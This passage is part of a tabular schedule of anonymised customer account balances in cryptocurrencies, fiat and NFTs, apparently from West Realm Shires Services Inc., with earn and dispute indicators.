| 07379520 | | DOGE[135.92165341], TRX[.00001367], USD[0.09] | | |
| 07379521 | | CUSDT[2], DOGE[224.93389937], ETH[.00590898], ETHW[.00590898], LTC[.08416271], USD[0.00] | | |
| 07379522 | | USD[10.00] | | |
| 07379523 | | USD[10.00] | | |
| 07379524 | | BTC[.0000104], GRT[1.50915919], USD[0.59] | | |
| 07379525 | | CUSDT[3], TRX[2], USD[0.00], USDT[0] | | |
| 07379526 | | USD[10.00] | | |
| 07379527 | | TRX[209.36392726], USD[0.00] | | |
| 07379528 | | USD[10.00] | | |
| 07379529 | | SHIB[2408244.52000195], USD[0.00] | Yes | |
| 07379530 | | USD[10.00] | | |
| 07379531 | | USD[10.00] | | |
| 07379532 | | CUSDT[2], DOGE[1], TRX[1], USD[0.01] | | |
| 07379533 | | USD[10.00] | | |
| 07379534 | | CUSDT[1], DOGE[876.29797416], USD[0.00] | | |
| 07379535 | | USD[10.00] | | |
| 07379536 | | CUSDT[1], USD[0.01] | | |
| 07379538 | | CUSDT[2], DOGE[21.23671882], USD[0.00] | | |
| 07379539 | | USD[10.00] | | |
| 07379540 | | CUSDT[1], DOGE[33.00001302], TRX[49.70963249], USD[0.00] | | |
| 07379541 | | USD[10.00] | | |
| 07379542 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07379543 | | ETH[.00692475], ETHW[.00692475], USD[0.00] | | |
| 07379545 | | DOGE[1], USD[53.33] | Yes | |
| 07379546 | | USD[10.00] | | |
| 07379547 | | BRZ[1], CUSDT[2], TRX[2], USD[0.00] | | |
| 07379548 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07379550 | | USD[411.81] | | |
| 07379551 | | USD[10.00] | | |
| 07379552 | | DOGE[0], TRX[0], USD[0.00] | | |
| 07379553 | | USD[10.00] | | |
| 07379555 | | ALGO[14.38848209], DOGE[36.99301502], NEAR[.00000616], SOL[.00000061], USD[0.00], USDT[0] | Yes | |
| 07379556 | | USD[10.00] | | |
| 07379557 | | USD[10.00] | | |
| 07379558 | | USD[10.00] | | |
| 07379559 | | BTC[0.00004304], DOGE[749.40644498], USD[0.00] | | |
| 07379560 | | CUSDT[1], DOGE[1594.46370506], SHIB[1468644.44118079], TRX[1], USD[0.00] | | |
| 07379561 | | CUSDT[2], TRX[2], USD[0.01] | Yes | |
| 07379562 | | BCH[0.01030536], BRZ[4], CUSDT[41], DOGE[29.57352040], KSHIB[42.55945152], LINK[0.32273744], LTC[0.04067320], MATIC[2.57479010], NFT (49946438774446844/Black.Troll.Marble)[1], NFT (555222262886991591/Old-Cube#4)[1], SHIB[119445.54036390], TRX[8], UNI[0], USD[0.00] | | |
| 07379563 | | USD[10.00] | | |
| 07379564 | | USD[10.00] | | |
| 07379565 | | BAT[.00004999], DOGE[0.00917761], SOL[.00056870], TRX[56.69398973], UNI[0], USD[0.08] | | |
| 07379566 | | USD[0.01], USDT[0] | | |
| 07379567 | | USD[0.00] | Yes | |
| 07379568 | | CUSDT[22], DOGE[3123.98657128], SHIB[5942134.04100043], TRX[1], USD[0.00] | Yes | |
| 07379569 | | USD[10.00] | | |
| 07379570 | | CUSDT[134.03251717], SHIB[121829.26981909], USD[0.00] | Yes | |
| 07379571 | | AAVE[1.39872631], BAT[86.51250992], BCH[.45575922], BRZ[3], BTC[0.02287144], CUSDT[18], DOGE[2741.06024131], ETH[0.26617905], ETHW[0.26598222], GRT[4.61423501], LINK[11.0529476], LTC[1.41023951], NFT (378100979332782850/Mexico )[1], NFT (448578497988876973/Joe Theismann's Playbook: Washington vs. Miami Dolphins - January 30, 1983 #59)[1], NFT (449143097145532962/Joe Theismann's Playbook: Washington vs. Miami Dolphins - January 30, 1983 #59)[1], NFT (522922348292699487/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #60)[1], NFT (523780032638397917/Downtown )[1], NFT (549751735670729598/Valdez )[1], NFT (559785806646690430/Joe Theismann's Playbook: New York Giants vs. Washington - October 20, 1974 #43)[1], SHIB[3], SOL[27.83165933], SUSHI[5.43134429], TRX[12.01456293], UNI[3.01470373], USD[0.00], USDT[5.24146141], YFI[.01052091] | Yes | |
| 07379572 | | USD[10.00] | | |
| 07379573 | | DOGE[136.80933006], USD[0.00] | | |
| 07379574 | | USD[10.00] | | |
| 07379575 | | USD[10.00] | | |
| 07379577 | | BCH[0], DOGE[148.20186941], USD[0.00], USDT[0] | Yes | |
| 07379578 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07379579 | | USD[10.00] | | |
| 07379580 | | DOGE[2.00244492], TRX[.00002546], USD[0.00] | | |
| 07379581 | | SUSHI[187.616], USD[1.30] | | |
| 07379582 | | USD[10.00] | | |
| 07379583 | | BAT[1], BCH[0], BRZ[1], CUSDT[12], DOGE[0], TRX[0], USD[0.00] | | |
| 07379584 | | USD[10.00] | | |
| 07379585 | Contingent, Disputed | USD[10.00] | | |
| 07379586 | | USD[10.00] | | |
| 07379587 | | BTC[0], DOGE[1], USD[0.00], USDT[0] | | |
| 07379588 | | SOL[.00001095], USD[0.00] | Yes | |
| 07379589 | | CUSDT[1], DOGE[313.40083642], USD[810.00] | | |
| 07379590 | | USD[10.00] | | |
| 07379591 | | CUSDT[1], DOGE[197.99514378], SOL[.32044021], USD[0.00] | | |
| 07379592 | | CUSDT[1], DOGE[138.45295437], USD[0.00] | | |
| 07379593 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07379594 | | CUSDT[2], USD[0.00] | | |
| 07379595 | | BTC[.00000001], DOGE[32.01806536], TRX[1], USD[0.05] | | |
| 07379596 | | DOGE[135.82409367], USD[0.00] | | |
| 07379597 | | CUSDT[2], DOGE[4685.70962145], TRX[2], USD[0.00] | | |
| 07379598 | | BTC[.00000153], CUSDT[1], USD[0.03] | Yes | |
| 07379599 | | BRZ[1], CUSDT[5], DOGE[1022.19855861], SHIB[1], TRX[1], USD[3.63] | Yes | |
| 07379600 | | BTC[.00021463], CUSDT[3], USD[0.01] | Yes | |
| 07379602 | | BRZ[1], DOGE[682.04365925], USD[10.00] | | |
| 07379603 | | BRZ[1], CUSDT[2], DOGE[1249.75468511], TRX[2], USD[0.00] | | |
| 07379604 | | USD[0.00] | Yes | |
| 07379605 | | USD[10.00] | | |
| 07379606 | | USD[10.00] | | |
| 07379609 | | DOGE[364.86109135], TRX[1], USD[0.00] | | |
| 07379610 | | CUSDT[3], DOGE[144.14142112], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07379611 | | ETH[.0045391], ETHW[.0045391], USD[0.00] | | |
| 07379612 | | DOGE[0], USD[0.02] | | |
| 07379613 | | ETH[.00312906], ETHW[.00312906], USD[0.00] | | |
| 07379614 | | DOGE[.00006014], ETH[.0051318], ETHW[.0051318], USD[0.00] | | |
| 07379615 | | DOGE[1.00008778], USD[0.01], USDT[0] | Yes | |
| 07379616 | | BRZ[1], CUSDT[2], GRT[1], TRX[1185.3685585], USD[0.00], USDT[1] | | |
| 07379617 | | USD[10.00] | | |
| 07379618 | | BTC[0], USD[0.34] | | |
| 07379619 | | USD[10.00] | | |
| 07379621 | | USD[0.05] | | |
| 07379622 | Contingent, Disputed | USD[10.00] | | |
| 07379623 | | USD[0.33] | | |
| 07379624 | | USD[10.00] | | |
| 07379625 | | DOGE[151.11618189], USD[0.00] | | |
| 07379626 | | TRX[1], USD[0.01] | | |
| 07379627 | | BAT[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], LTC[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07379628 | | USD[10.00] | | |
| 07379629 | | BTC[.00020915], USD[0.00] | | |
| 07379630 | | USD[10.00] | | |
| 07379631 | | USD[10.00] | | |
| 07379632 | | DOGE[132.96039626], USD[0.27] | | |
| 07379633 | | DOGE[.99128487], USD[0.00] | | |
| 07379634 | | USD[10.00] | | |
| 07379635 | | USD[10.00] | | |
| 07379636 | | BCH[.02933983], BTC[.00783776], CUSDT[8], DOGE[543.86090742], ETH[.02786121], ETHW[.02786121], KSHIB[65.61467102], LTC[.11110591], SHIB[65172.05422314], SOL[1.0030264], TRX[211.62883519], USD[0.02], YFI[.00025188] | | |
| 07379638 | | USD[10.00] | | |
| 07379639 | | USD[10.00] | | |
| 07379641 | | CUSDT[1], DOGE[1], SHIB[938876.01390498], USD[0.00] | | |
| 07379642 | | USD[10.00] | | |
| 07379643 | | BTC[.00017897], USD[0.00] | | |
| 07379644 | | USD[9.72] | | |
| 07379645 | | CUSDT[6], DOGE[1], SOL[0], TRX[2], USD[0.00] | | |
| 07379646 | | USD[10.00] | | |
| 07379647 | | USD[10.00] | | |
| 07379650 | | SOL[0.20845004], USD[0.00] | Yes | |
| 07379651 | | DOGE[.0000292], USD[0.07] | | |
| 07379653 | | DOGE[76.41213834], TRX[89.79570578], USD[0.00] | | |
| 07379654 | | USD[10.00] | | |
| 07379655 | | USD[0.00] | | |
| 07379656 | | CUSDT[1], DOGE[358.37458903], TRX[203.89714167], USD[0.00] | | |
| 07379657 | | DOGE[131.10551844], USD[0.00] | | |
| 07379658 | | BTC[.00134771], DOGE[1], LTC[.04399014], USD[0.00] | | |
| 07379659 | | USD[10.00] | | |
| 07379660 | | BAT[1], BRZ[1], BTC[.04860847], CUSDT[4], DOGE[1], LINK[14.81231663], SOL[136.46963879], TRX[4965.52159336], USD[0.00], USDT[1] | | |
| 07379664 | | BRZ[4], CUSDT[13], GRT[0], TRX[9], USD[0.86] | | |
| 07379665 | | BTC[.00277162], CUSDT[3], DOGE[1], SHIB[5], TRX[1], USD[0.00] | Yes | |
| 07379667 | | TRX[0], USD[0.00] | | |
| 07379668 | | BTC[.00117374], DOGE[788.50445643], USD[10.91] | Yes | |
| 07379669 | | USD[10.00] | | |
| 07379671 | | BTC[.00018983], USD[10.00] | | |
| 07379672 | | CUSDT[1], GRT[1], TRX[1], USD[0.00] | | |
| 07379673 | | BCH[0], BRZ[2], BTC[0], CUSDT[3], DOGE[136.72080852], GRT[1], USD[0.62] | | |
| 07379674 | | USD[10.00] | | |
| 07379675 | | SUSHI[0], TRX[1.09985312], USD[0.00], USDT[0.00005007] | | |
| 07379676 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07379677 | | DOGE[177.39133273], USD[0.00] | | |
| 07379678 | | USD[10.00] | | |
| 07379679 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07379680 | | USD[0.00] | | |
| 07379681 | | USD[0.00] | | |
| 07379682 | | USD[13.00] | | |
| 07379683 | | BRZ[1], DOGE[.00199089], USD[0.01] | | |
| 07379684 | | USD[10.00] | | |
| 07379685 | | USD[10.00] | | |
| 07379686 | | USD[0.00] | | |
| 07379687 | | DOGE[1], USD[0.01] | | |
| 07379688 | | DOGE[186.81414018], USD[0.00] | Yes | |
| 07379689 | | BRZ[2], BTC[.00282239], CUSDT[8.00001587], DOGE[113.57605294], SHIB[1], TRX[1.00003517], USD[0.05] | Yes | |
| 07379690 | | CUSDT[1.0110559], DOGE[482.13526637], SOL[.15835813], TRX[93.88003546], USD[0.00] | Yes | |
| 07379691 | | AAVE[.10634043], ALGO[21.91076008], AVAX[.40011476], BAT[21.90298192], BCH[.05063701], BRZ[4], BTC[.00021822], CUSDT[128.22340875], DOGE[2846.63129719], ETH[.00529897], ETHW[.00523057], GRT[55.34740436], KSHIB[202.59677744], LINK[1.15898422], LTC[.38533982], MATIC[55.02729816], MKR[.00677938], NEAR[1.88115296], PAXG[.00273332], SHIB[42302719.02451112], SOL[1.49309404], SUSHI[6.58321639], TRX[12713.45780268], UNI[1.8112703], USD[20.51], USDT[4.974284481, YFI[.00103473] | Yes | |
| 07379692 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07379694 | | BTC[.00021054], USD[0.00] | | |
| 07379695 | | BCH[.00408956], BTC[.00004531], DOGE[24.69698348], ETH[.00115263], ETHW[.00115263], LTC[.00585895], TRX[22.77740891], USD[0.00] | | |
| 07379696 | | USD[10.00] | | |
| 07379697 | | BAT[385.88874176], CUSDT[2], DOGE[14.92533873], TRX[7146.31301259], USD[0.00] | Yes | |
| 07379698 | | BRZ[2], CUSDT[4], DOGE[0], TRX[1], USD[0.00] | Yes | |
| 07379699 | | USD[10.00] | | |
| 07379700 | | USD[10.00] | | |
| 07379701 | | BAT[1.00851423], BRZ[1], BTC[0], CUSDT[1], DOGE[4.00926919], ETH[0], SOL[55.88374038], TRX[3], USD[0.00], USDT[3.26442936] | Yes | |
| 07379702 | | BTC[0], MATIC[100], USD[129.01], USDT[0] | | |
| 07379703 | | DOGE[139.76398614], USD[0.00] | | |
| 07379704 | | USD[68.22] | Yes | |
| 07379705 | | BAT[1], DOGE[1021.31078622], USD[0.00] | | |
| 07379706 | | BAT[1], BRZ[1], CUSDT[1], TRX[1], USD[0.46], USDT[1] | | |
| 07379708 | | DOGE[1], USD[7.64] | | |
| 07379710 | | BAT[0], BRZ[5.07956212], BTC[0], CUSDT[230.31271237], DOGE[89.82867263], ETH[0], KSHIB[1579.23968931], LINK[2.03532371], SHIB[3237723.60083306], SOL[0], SUSHI[1.13612959], TRX[171.30450924], USD[0.00] | Yes | |
| 07379711 | | DOGE[2.2105655], USD[0.00] | | |
| 07379712 | | USD[0.00] | | |
| 07379713 | | USD[10.00] | | |
| 07379714 | | USD[10.00] | | |
| 07379716 | | USD[10.00] | | |
| 07379717 | | BRZ[2], CUSDT[4], DOGE[0.90259500], GRT[.00358734], SOL[.0002571], TRX[.006907], USD[0.74], USDT[0.00411140] | Yes | |
| 07379718 | | DOGE[170.23864223], USD[0.00] | | |
| 07379719 | | USD[10.00] | | |
| 07379720 | | DOGE[15.7077517], TRX[1], USD[0.00] | Yes | |
| 07379721 | | USD[10.00] | | |
| 07379722 | | DOGE[124.25870684], USD[11.06] | Yes | |
| 07379723 | | DOGE[640.70596773], NFT (44591376348290727 0/Imola Ticket Stub #323)[1], SHIB[1877402.13066514], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07379724 | | DOGE[.17920072], USD[0.02] | Yes | |
| 07379726 | | DOGE[142.43512792], USD[0.00] | | |
| 07379727 | | BTC[.00005513], CUSDT[9], ETH[.00000058], ETHW[.00000058], TRX[1], USD[0.01] | | |
| 07379728 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07379729 | | USD[10.00] | | |
| 07379730 | | BAT[1], BRZ[1], CUSDT[1], DOGE[44055.57965655], GRT[2], LINK[1], SOL[1], SUSHI[1], TRX[100029.86046399], USD[0.00], USDT[2] | | |
| 07379731 | | DOGE[143.56990591], USD[0.00] | | |
| 07379732 | | USD[10.00] | | |
| 07379733 | | ALGO[.89131205], BAT[.23845352], BRZ[4], BTC[0.00000047], CUSDT[10.33595382], DOGE[4.00016246], ETH[0.06993168], ETHW[0.29579984], GRT[51.33447134], SHIB[227740.55861002], TRX[22.52842737], USD[5.38] | Yes | |
| 07379735 | | BRZ[2], BTC[0], CUSDT[4], DOGE[2], ETH[0], LTC[0], TRX[2], USD[0.01] | | |
| 07379736 | | USD[0.00], USDT[0] | | |
| 07379737 | | BRZ[0], DOGE[30787.67217958], GRT[0], SHIB[15852323.10703459], USD[0.00], USDT[0] | Yes | |
| 07379738 | | CUSDT[1], USD[0.00] | | |
| 07379739 | | USD[10.00] | | |
| 07379741 | | USD[10.00] | | |
| 07379742 | | CUSDT[2], DOGE[3146.82109592], TRX[1], USD[0.00] | | |
| 07379743 | | BRZ[2], DOGE[1], USD[0.00], USDT[1] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07379744 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07379745 | | USD[10.00] | | |
| 07379746 | | USD[0.00] | | |
| 07379747 | Contingent, Disputed | NFT (432497857605044715/Imola Ticket Stub #1061)[1], SHIB[.00000001], USD[0.00], USDT[0] | | |
| 07379748 | | DOGE[135.02224559], USD[0.00] | | |
| 07379749 | | GRT[4.87776503], USD[0.00] | | |
| 07379750 | | DOGE[138.42568195], USD[0.00] | | |
| 07379751 | | BAT[1], BRZ[1], CUSDT[1], DOGE[2], USD[0.00] | | |
| 07379752 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07379753 | | BF_POINT[100], BRZ[4], CUSDT[268.255729], DOGE[81.58217242], SHIB[2], TRX[17.17116917], USD[0.06] | Yes | |
| 07379754 | | BRZ[6], CUSDT[27], TRX[1], USD[1.36] | | |
| 07379755 | | USD[10.00] | | |
| 07379758 | | CUSDT[3], TRX[1], USD[0.00] | Yes | |
| 07379759 | | CUSDT[10], TRX[2], USD[0.00] | Yes | |
| 07379761 | | DOGE[1], USD[0.01] | | |
| 07379762 | | DOGE[182.68142525], USD[0.00] | | |
| 07379763 | | BAT[0], DOGE[0], LINK[0], MATIC[0], NFT (353180280653678534/The best )[1], NFT (495330101491726058/Imola Ticket Stub #141)[1], SHIB[370047.68470102], TRX[0], USD[0.00] | Yes | |
| 07379764 | | USD[287.30] | | |
| 07379765 | | DOGE[1632.85812053], USD[0.00] | | |
| 07379766 | | USD[10.00] | | |
| 07379767 | | BTC[0.00003667], SOL[.076] | | |
| 07379769 | | CAD[0.00], USD[5.51] | | |
| 07379770 | | DOGE[0], USD[0.00] | | |
| 07379771 | | USD[3.92] | | |
| 07379772 | | USD[10.00] | | |
| 07379774 | | USD[10.00] | | |
| 07379775 | | CUSDT[3], USD[0.00] | | |
| 07379776 | | DOGE[472.84726217], USD[0.00] | Yes | |
| 07379777 | | SUSHI[.95279447], USD[0.00] | Yes | |
| 07379778 | | BTC[0.00000001], SOL[0], USD[0.00] | | |
| 07379779 | | USD[0.00] | | |
| 07379781 | | TRX[1], USD[0.00] | | |
| 07379782 | | USD[20.00] | | |
| 07379783 | | USD[10.00] | | |
| 07379785 | | USD[0.01] | Yes | |
| 07379786 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07379787 | | DOGE[465.35389601], TRX[1], USD[0.00] | | |
| 07379788 | | CUSDT[1], TRX[211.36720126], USD[0.00] | | |
| 07379789 | | AAVE[1.01222729], AVAX[0], BAT[0], BF_POINT[200], BRZ[0], BTC[0.22120402], DAI[0], DOGE[391.26838901], ETH[.26846207], NFT (443389922039560607/Entrance Voucher #3560)[1], SOL[0], SUSHI[0], TRX[0], USD[172.66], USDT[0.00000008] | Yes | |
| 07379790 | | TRX[1], USD[0.00] | | |
| 07379791 | | BAT[0], BTC[0], CUSDT[5], DOGE[889.23113153], ETH[0], SOL[0], UNI[0], USD[0.00] | Yes | |
| 07379793 | | USD[10.00] | | |
| 07379796 | | BRZ[1], CUSDT[5], DOGE[334.86284101], ETH[.000323], ETHW[.000323], LTC[.000071], TRX[3], USD[110.61] | | |
| 07379797 | | USD[10.00] | | |
| 07379798 | | CUSDT[2], USD[0.01] | | |
| 07379799 | | USD[10.00] | | |
| 07379800 | | BAT[1.01182272], BRZ[2], BTC[.01270395], CUSDT[3], DOGE[0], SHIB[32783262.36249595], SOL[1.08856256], USD[0.00], USDT[0] | Yes | |
| 07379801 | | USD[9.89] | | |
| 07379802 | | USD[9.89] | | |
| 07379803 | | USD[10.00] | | |
| 07379806 | | DOGE[127.70508618], USD[0.00] | | |
| 07379807 | | USD[10.00] | | |
| 07379808 | | USD[0.19] | | |
| 07379811 | | USD[10.00] | | |
| 07379812 | | USD[10.00] | | |
| 07379813 | | USD[10.00] | | |
| 07379815 | | USD[10.00] | | |
| 07379817 | | TRX[209.2079971], USD[0.00] | | |

West Realm Shires Services Inc.

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07379818 | | TRX[1850.14754902], USD[0.06] | Yes | |
| 07379819 | | CUSDT[1], DOGE[13214.28080506], ETH[.067215], ETHW[.067215], USD[10.00] | | |
| 07379821 | | DOGE[.444], USD[0.00] | | |
| 07379822 | | BRZ[2], CUSDT[4], DOGE[255.30849505], EUR[0.00], USD[0.00] | | |
| 07379823 | | CUSDT[2], DOGE[621.04775751], ETH[.02470377], ETHW[.02470377], TRX[1], USD[10.00] | | |
| 07379824 | | BTC[0.00442881], ETH[.100302], ETHW[.100302], SOL[.63961], USD[4.87] | | |
| 07379825 | | BAT[0], CUSDT[5], DOGE[5.09695506], USD[0.00] | Yes | |
| 07379826 | | USD[10.00] | | |
| 07379827 | | BTC[.0000596], ETH[.000664], ETHW[.000664], SOL[.498], TRX[.6], USD[3.89] | | |
| 07379828 | | USD[10.00] | | |
| 07379829 | | USD[10.00] | | |
| 07379830 | | USD[10.00] | | |
| 07379831 | | DOGE[164.29135247], USD[0.00] | Yes | |
| 07379833 | | DOGE[124.39540722], USD[0.00] | | |
| 07379834 | | DOGE[136.54231439], USD[0.00] | | |
| 07379835 | | USD[10.00] | | |
| 07379836 | | DOGE[37.82754848], TRX[1], USD[6.32] | | |
| 07379837 | | BRZ[12], CUSDT[13], DOGE[5], ETH[1.67702578], ETHW[1.67702578], GRT[1], MATIC[171.79135747], SHIB[1], TRX[2], USD[0.00], USDT[7] | | |
| 07379838 | | DOGE[2], TRX[1], USD[0.01] | | |
| 07379839 | | DOGE[26.58653979], USD[0.00] | | |
| 07379840 | | CUSDT[399.46690294], USD[0.00] | | |
| 07379841 | | BTC[0.00006683], SOL[5158.8696], SUSHI[.004], USD[2.70], USDT[33.2270655] | | |
| 07379842 | | CUSDT[3], DOGE[0], SHIB[423482.16636709], USD[0.00] | Yes | |
| 07379843 | | BF_POINT[300], BTC[0], DOGE[0], USD[0.00] | | |
| 07379844 | | BTC[0], DOGE[0], ETH[0.00446295], ETHW[0.00440819], LTC[0], USD[0.00] | Yes | |
| 07379845 | | BRZ[0], TRX[0], USD[0.02] | | |
| 07379846 | | USD[10.00] | | |
| 07379847 | | ETH[0], ETHW[0], USD[0.01] | Yes | |
| 07379848 | | USD[10.00] | | |
| 07379849 | | CUSDT[1], TRX[2], USD[0.32], USDT[1.08672488] | Yes | |
| 07379850 | | USD[10.00] | | |
| 07379851 | | USD[10.00] | | |
| 07379853 | | CUSDT[1], DOGE[0], ETH[.00000013], ETHW[.00000013], SOL[0], USD[0.61] | Yes | |
| 07379854 | | BF_POINT[200], CUSDT[20], DOGE[154.50808442], ETH[0], MATIC[26.78932867], SHIB[10815769.57258717], SOL[1.30716919], TRX[2277.66461702], USD[0.00] | Yes | |
| 07379855 | | AVAX[.00330878], BTC[0], DAI[.08397447], ETH[.0045295], ETHW[.0045295], NFT [484881490682316237/Entrance Voucher #2812][1], USD[17842.77], USDT[.20726418], WBTC[.00007065] | Yes | |
| 07379856 | | USD[10.00] | | |
| 07379857 | | USD[0.38] | | |
| 07379858 | | DOGE[18.89810788], USD[0.01] | | |
| 07379859 | | CUSDT[2], LINK[.53525333], USD[0.00] | | |
| 07379860 | | USD[10.00] | | |
| 07379861 | | CUSDT[2], DOGE[1], TRX[1], USD[112.18] | | |
| 07379862 | | USD[10.00] | | |
| 07379863 | | USD[10.21] | Yes | |
| 07379864 | | BRZ[1], CUSDT[4], DOGE[1], TRX[2], USD[0.01] | | |
| 07379865 | | USD[10.00] | | |
| 07379866 | | DOGE[114.34930667], USD[0.04] | | |
| 07379867 | | CUSDT[2], DOGE[2.80936588], TRX[2], USD[0.00] | | |
| 07379870 | | DOGE[134.37349165], USD[0.00] | | |
| 07379871 | | CUSDT[3], DOGE[26.63439337], TRX[156.75220403], USD[0.00] | | |
| 07379872 | | USD[10.00] | | |
| 07379873 | | BRZ[1], TRX[2], USD[0.00] | | |
| 07379874 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07379876 | | BAT[0], BRZ[5.07952967], BTC[0], CUSDT[3], DOGE[3], NFT [357569208015753226/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #68][1], NFT [396881607089050291/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #71][1], NFT [459129830905170544/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #60][1], NFT [521032745480410365/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #53][1], SHIB[1], SOL[0], TRX[3], USD[0.00] | Yes | |
| 07379877 | | TRX[2], USD[0.01] | | |
| 07379878 | | BRZ[1], CUSDT[3], DOGE[10197.6642547], ETH[.04760045], ETHW[.04701178], USD[0.01], USDT[1.10579634] | Yes | |
| 07379879 | | USD[310.00] | | |
| 07379881 | | LTC[0.00241066], SOL[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07379882 | | USD[10.00] | | |
| 07379884 | | DOGE[1], USD[27.96] | | |
| 07379886 | | USD[10.00] | | |
| 07379887 | | BRZ[0], GRT[1.00498957], SOL[.03721274], SUSHI[.00706421], USD[0.00], USDT[0] | Yes | |
| 07379888 | | BTC[.00000011], CUSDT[4], DOGE[250.00647986], TRX[2], USD[0.04] | | |
| 07379889 | | USD[10.00] | | |
| 07379890 | | USD[10.00] | | |
| 07379891 | | USD[10.00] | | |
| 07379892 | | DOGE[0], SHIB[5754029.59429209], USD[0.00] | Yes | |
| 07379893 | | CUSDT[10], DOGE[993.30013321], USD[0.00], USDT[0] | | |
| 07379894 | | BTC[0], USD[0.00] | | |
| 07379895 | | USD[10.00] | | |
| 07379896 | | DOGE[183.552], USD[0.33], USDT[0.00000001] | | |
| 07379897 | | CUSDT[1], USD[0.01] | | |
| 07379898 | | DOGE[1], USD[0.00] | | |
| 07379899 | | CUSDT[1], TRX[2], USD[0.01] | | |
| 07379900 | | USD[10.00] | | |
| 07379901 | | USD[10.00] | | |
| 07379902 | | USD[0.00] | | |
| 07379903 | | USD[10.00] | | |
| 07379904 | | USD[10.00] | | |
| 07379905 | Contingent, Disputed | USD[10.00] | | |
| 07379906 | | USD[10.00] | | |
| 07379907 | | USD[10.00] | | |
| 07379908 | | BCH[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], MATIC[0], SHIB[0], USD[0.01], USDT[0] | | |
| 07379909 | | BAT[0], BTC[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07379910 | | SOL[0] | | |
| 07379912 | | DOGE[118.32552895], NFT (413634414381693014/Entrance Voucher #3874)[1], USD[0.12] | | |
| 07379913 | | TRX[103.88801475], USD[0.00] | Yes | |
| 07379914 | | AUD[2.54], BCH[.00138578], LINK[.05926207], PAXG[.0026913], USD[0.00] | | |
| 07379915 | | BRZ[5.25398416], CUSDT[7], USD[0.00] | | |
| 07379917 | | CUSDT[1], DOGE[33.45095164], USD[64.85] | | |
| 07379919 | | BTC[0], DOGE[0], ETH[0.04948516], SHIB[6908495.61464830], USD[65.90], USDT[0] | Yes | |
| 07379921 | | BAT[1], BRZ[1], CUSDT[1], GRT[1.00498957], SHIB[1], TRX[2], USD[0.02] | Yes | |
| 07379922 | | BRZ[4], BTC[.00000718], CUSDT[2.15593584], DOGE[2.1198646], ETHW[.1949005], GRT[1.00367791], SHIB[1], USD[271.30] | Yes | |
| 07379923 | | BAT[1], BTC[0], CUSDT[1], GRT[0], TRX[3], USD[0.00] | | |
| 07379924 | | USD[10.00] | | |
| 07379925 | | USD[10.00] | | |
| 07379926 | | USD[10.00] | | |
| 07379927 | | BRZ[1], DOGE[0], ETH[0], SHIB[0], TRX[1], USD[0.00] | | |
| 07379928 | | AUD[0.00], BCH[0], BTC[0.00001026], DOGE[0], ETH[0], ETHW[0], GRT[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00015710], WBTC[0], YFI[0] | | |
| 07379929 | | NFT (306886176927507890/Warriors Hoop #275 (Redeemed))[1], NFT (310564369180084233/2974 Floyd Norman - CLE 6-0141)[1], NFT (320007594069341192/GSW Western Conference Finals Commemorative Banner #372)[1], NFT (321975354069885936/GSW Championship Commemorative Ring)[1], NFT (338234650391711757/GSW Western Conference Finals Commemorative Banner #375)[1], NFT (346607953437580870/GSW Western Conference Finals Commemorative Banner #374)[1], NFT (346655099418388057/GSW Round 1 Commemorative Ticket #371)[1], NFT (355159126001270296/GSW Western Conference Finals Commemorative Banner #370)[1], NFT (360254135896909923/GSW Championship Commemorative Ring)[1], NFT (374570079259145966/GSW Western Conference Finals Commemorative Banner #369)[1], NFT (403382482529727377/GSW Championship Commemorative Ring)[1], NFT (414678838628945521/The 2974 Collection #2496)[1], NFT (417548815444503677/GSW Round 1 Commemorative Ticket #372)[1], NFT (427952931496313777/GSW Western Conference Semifinals Commemorative Ticket #126)[1], NFT (450563372477927293/GSW Championship Commemorative Ring)[1], NFT (456804560117734626/GSW Western Conference Semifinals Commemorative Ticket #28)[1], NFT (477845254553278438/Birthday Cake #2496)[1], NFT (481754927661913776/GSW Western Conference Semifinals Commemorative Ticket #125)[1], NFT (489638459791990084/GSW Western Conference Finals Commemorative Banner #373)[1], NFT (497691275939855648/GSW 2015 Championship Ring #18 (Redeemed))[1], NFT (514826907954705019/GSW Western Conference Semifinals Commemorative Ticket #127)[1], NFT (527299952419099128/Warriors Logo Pin #253 (Redeemed))[1], NFT (534084447265520389/GSW Western Conference Finals Commemorative Banner #376)[1], NFT (553458746810061393/GSW 